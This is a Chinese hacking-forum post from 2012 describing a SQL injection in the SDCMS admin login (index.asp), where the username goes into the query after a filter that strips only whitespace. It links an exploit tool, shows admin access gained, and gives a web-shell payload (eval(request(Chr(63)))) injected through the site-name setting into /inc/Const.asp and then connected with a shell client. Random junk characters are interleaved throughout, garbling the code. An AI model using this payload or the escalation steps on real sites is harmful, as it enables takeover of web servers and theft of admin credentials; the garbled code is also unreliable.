作者:T00LS 鬼哥, {7 d: j6 w( s+ _; D, X/ q' n1 ^# \
漏洞文件:后台目录/index.asp
; f2 C$ _, T: m/ k, G
8 ^7 o: O6 i5 R4 Z# P, w0 g; NSub Check
, P0 S W: Z K' V+ Z! V; p8 h Dim username,password,code,getcode,Rs
4 E' L7 |' {/ V IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub1 }' Y! h) V' e% r
username=FilterText(Trim(Request.Form("username")),1)
6 I1 Z( K+ p1 ]/ q3 ~ password=FilterText(Trim(Request.Form("password")),1)
$ k* X( ^& i; \1 S( o! x" r- O& j code=Trim(Request.Form("yzm"))
, L1 `" y( M _& N- } getcode=Session("SDCMSCode")6 r6 [: T2 n' q
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died8 j: T7 I ?, j4 B# K. y
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
0 }) U7 h0 g+ e! m, B7 t# w. ~& C IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied/ C0 e% T2 l8 X" {) C6 Q
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied& _1 }- k9 }" f3 Q- K
IF username="" or password="" Then
5 X$ g2 L1 f5 j$ ^2 o Echo "用户名或密码不能为空"ied
7 O3 ^( _4 Z5 \" x7 \( [4 \, ~ Else
1 \% v2 Q+ ?. i {# ^+ Y Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'"); m8 m; Q2 |6 b% x& j5 A6 |
IF Rs.Eof Then
: X) |# S' w$ [& p AddLog username,GetIp,"登录失败",1$ M5 |" E$ c2 o) J+ x# V
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
7 S% I' C# b& H Else D8 R; X; y. C" `- e
Add_Cookies "sdcms_id",Rs(0)2 e, O7 z: ?3 K: I0 P8 [2 R$ \
Add_Cookies "sdcms_name",username
, p0 x% A$ x1 [; m. \1 T1 ] Add_Cookies "sdcms_pwd",Rs(2)
4 O4 w% d7 J" \# c1 i4 b$ K Add_Cookies "sdcms_admin",Rs(3)
6 x0 B) R% s+ |4 _ Add_Cookies "sdcms_alllever",Rs(4)
* j" r" ^/ M2 {* i Add_Cookies "sdcms_infolever",Rs(5)) E# m. L+ w& K O
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")2 X6 Y; o5 D4 b" h0 }) z
AddLog username,GetIp,"登录成功",1
+ d8 X* a/ N2 { '自动删除30天前的Log记录9 u8 x% \3 D6 O/ K& b- J
IF Sdcms_DataType Then; l5 {1 ~" E' \) O% m
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
; k6 W6 {! o+ M! M* O: G Else
- h% T! I5 J- f0 A/ k& R1 h) t8 H Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")! j/ A1 t6 ~0 e8 v) @
End IF! B8 m, s1 O/ X& C; i; G# {
Go("sdcms_index.asp")0 [/ Y, A! U) k5 ^( _
End IF) J3 r. Q! g j; Y; V/ |0 m
Rs.Close
0 T, M1 w' L" e8 Y Set Rs=Nothing0 |- b4 a" R4 {7 E) A
End IF3 Y9 {. A- e8 l/ `, _8 P9 ~# N8 Y/ k
End Sub5 C: S d& e8 j7 v5 o7 t
8 ~9 t: I/ n, B/ `0 M1 H’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
0 ]- O1 r! v; G( V6 x/ H7 M1 @4 ]" v. U4 m. J- O3 D
Function FilterText(ByVal t0,ByVal t1)
4 J: W: t3 O! ]/ s" s I* e IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function9 l: k4 A; o# x7 Q% N1 Q
t0=Trim(t0)
7 }4 U2 t+ @! F Select Case t1
* K1 G( _/ U, H" t J3 K# o. e Case "1"
7 z* P4 H" H# |- \3 G t0=Replace(t0,Chr(32),"")3 r1 T- E5 }3 W- V q8 t, Q7 o
t0=Replace(t0,Chr(13),""): ~5 k! s! o3 v- \
t0=Replace(t0,Chr(10)&Chr(10),"")
( X. O, P* k5 H7 ~6 a t0=Replace(t0,Chr(10),"")
$ S& J# ?. s2 {4 z' v Case "2"7 J! X7 U l2 y$ a
t0=Replace(t0,Chr(8),"")'回格1 r+ c0 |. I) `
t0=Replace(t0,Chr(9),"")'tab(水平制表符)' n7 ^& K0 x) a- O0 V
t0=Replace(t0,Chr(10),"")'换行 O/ q5 U4 \/ }* ^5 n; A
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
1 ~; {( n+ G$ @' N- J" e. Z t0=Replace(t0,Chr(12),"")'换页
% ~& {( a2 P5 T t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
, Z$ ~3 C) V$ h t0=Replace(t0,Chr(22),"")
* W. d$ L. V1 i5 [+ V: n t0=Replace(t0,Chr(32),"")'空格 SPACE
3 n3 I) ^7 T, @0 _8 f- ? t0=Replace(t0,Chr(33),"")'!3 D; ~6 ]+ w* `; z4 T q$ Q0 L
t0=Replace(t0,Chr(34),"")'"/ ^! Z0 s" |- s; I5 N
t0=Replace(t0,Chr(35),"")'#! L! F0 S) ]6 E
t0=Replace(t0,Chr(36),"")'$( W+ U6 M! U$ u' Z Q
t0=Replace(t0,Chr(37),"")'%6 W; h9 s( a) c8 B+ j
t0=Replace(t0,Chr(38),"")'&
) ?! S: }% ?9 a l5 [6 m! r t0=Replace(t0,Chr(39),"")''2 [2 d) Q( Z: G1 q/ j E
t0=Replace(t0,Chr(40),"")'(9 d4 F4 T/ E$ T( _/ q
t0=Replace(t0,Chr(41),"")')
: b. `7 {0 i: w& i9 n t0=Replace(t0,Chr(42),"")'*# Q( S$ Y* y/ I2 m* D
t0=Replace(t0,Chr(43),"")'+
" K: P. e! {0 p t0=Replace(t0,Chr(44),"")',# V8 R% V3 I0 @4 Z' A% P
t0=Replace(t0,Chr(45),"")'-
& }$ h3 Y0 \. f. M; f t0=Replace(t0,Chr(46),"")'.% T- T/ j# v8 W: c7 Q2 M. x
t0=Replace(t0,Chr(47),"")'/( C, V8 @1 D- ~ G& j
t0=Replace(t0,Chr(58),"")':
! X% D8 Q; ^+ i! ~+ {2 G( M t0=Replace(t0,Chr(59),"")';
% {2 U3 C8 |" y8 V/ M* } t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
% M7 ]7 _. k ~& V# J: [8 w+ X% H t0=Replace(t0,Chr(63),"")'?4 u$ X. F! b1 |0 m8 i: Z5 v
t0=Replace(t0,Chr(64),"")'@
/ Q7 C* n. K# u# I t0=Replace(t0,Chr(91),"")'\
( q) U; S2 a* U9 n6 ~5 Q t0=Replace(t0,Chr(92),"")'\
, G8 B3 p" A8 n( \ t0=Replace(t0,Chr(93),"")']3 B7 f5 u4 k5 L, S! G
t0=Replace(t0,Chr(94),"")'^
- g% h; y, H _6 M- k t0=Replace(t0,Chr(95),"")'_( v; _2 j. N0 s- n1 C
t0=Replace(t0,Chr(96),"")'`
- @1 |6 i3 A8 [! o t0=Replace(t0,Chr(123),"")'{5 h. m. c0 [* G0 {2 Q
t0=Replace(t0,Chr(124),"")'|1 @, X3 w/ G( D
t0=Replace(t0,Chr(125),"")'}
/ l. m9 E* g) B- m t0=Replace(t0,Chr(126),"")'~! T; ?* {, c/ f, L) `
Case Else& X9 G1 ]' l4 V1 X4 D
t0=Replace(t0, "&", "&")
; Y* K0 q% F# ?9 j* }" S. m8 c t0=Replace(t0, "'", "'")
$ h" K& v- u5 T8 \3 E t0=Replace(t0, """", """)& k H2 ?& m3 P! P3 c4 l, P% w
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
" L1 \! K8 T9 G4 A4 a2 p2 \ End Select
8 \9 k( a/ n' }( E- B( l* D IF Instr(Lcase(t0),"expression")>0 Then8 m* E) B/ h! O+ m4 A
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
( v+ z* C+ n: ~( R2 u End If. Q( L' s! p3 ?/ V" ]* q& Q+ C
FilterText=t06 z/ F# B s0 c8 P, S+ w$ ]
End Function
- A* x; d' C$ ?" k
, q# S% e- i- a' j看到没。直接参数是1 只过滤
1 d# \0 c' Z {$ f" _ t0=Replace(t0,Chr(32)," ")
, x4 H _& u e3 b3 [$ G8 Z7 ~1 Y t0=Replace(t0,Chr(13),"")+ b; C5 y3 w L N( `
t0=Replace(t0,Chr(10)&Chr(10),"
% J" ]4 L+ B5 F* {")
/ L/ [- p$ a u- E' t' X t0=Replace(t0,Chr(10),"
% z# E- K1 |7 D- A' I; o f")8 z! p$ W: ~$ m/ C* }( T1 @9 H
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
/ L& I. Z# q" @. l6 z* hEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
2 v$ J3 [8 s* u: y# s
' ~2 K3 P% d7 g4 }* x7 U% h/ ~! |测试:
O# t( s8 \; n! }' ?3 C; d* c7 L. t
' H5 O1 T+ J. e+ s/ C现在输入工具上验证码,然后点OK8 T" G3 _5 K$ Z
( f! G6 E- _- ^& f# X# z! M" r- E8 `+ i3 V) d
看到我们直接进入后台管理界面了,呵呵!8 i& G' `8 m; y" K3 a
7 {( d6 K& I$ C# r, W/ r
8 w/ O- Q( e- T2 `3 O! K: e2 j
9 `; P2 W! ?4 D这样直接进入后台了。。。。' i7 Q+ Y: V. Q/ U7 z, U
' l2 [% s. J- i7 K! w
. G1 o; A5 l }
% _; \. h: B. j1 H$ F TSDCMS提权:
# s o4 M1 b) P$ p8 Q `% Z
* Y. g9 S" I( m3 w" Z& i方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?# g" {9 o* ]2 i' Q3 K2 |6 [/ g2 l
' E9 g$ A0 I. j0 N
6 y% }: K* ]1 s! L* p' d
$ ^# p! R( d; D, F: zOK,现在用菜刀连接下!6 {$ _' h. S- @( M
5 x6 r, ?7 T3 Q$ ?: U |6 B, c8 [% G5 c5 k/ ?2 o
5 K0 @, l# A# l M
: k' H. @9 ~0 @8 R" p& Y' V
, Z- s; ?6 c# l, g/ ^% N, ~+ q/ Z |
发表于 2012-11-9 20:57:02
收藏
支持
反对